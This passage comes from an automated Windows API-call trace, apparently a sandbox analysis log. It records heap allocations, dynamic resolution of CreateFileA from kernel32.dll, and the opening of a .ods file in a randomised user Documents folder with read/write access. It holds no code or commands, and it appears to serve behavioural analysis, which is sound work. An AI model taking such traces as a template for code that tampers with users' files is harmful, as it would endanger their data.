(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0033.942] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.944] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c790 [0033.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c790, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.945] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0033.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c790 [0033.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c790, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0033.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.945] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0033.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0033.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods", cchWideChar=115, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 115 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x73) returned 0x7800d0 [0033.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods", cchWideChar=115, lpMultiByteStr=0x7800d0, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods", lpUsedDefaultChar=0x0) returned 115 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.946] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46\\bgb2.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=115, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe6) returned 0x7c75e8 [0033.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=115, lpWideCharStr=0x7c75e8, cchWideChar=115 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods") returned 115 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75e8 | out: hHeap=0x770000) returned 1 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.948] 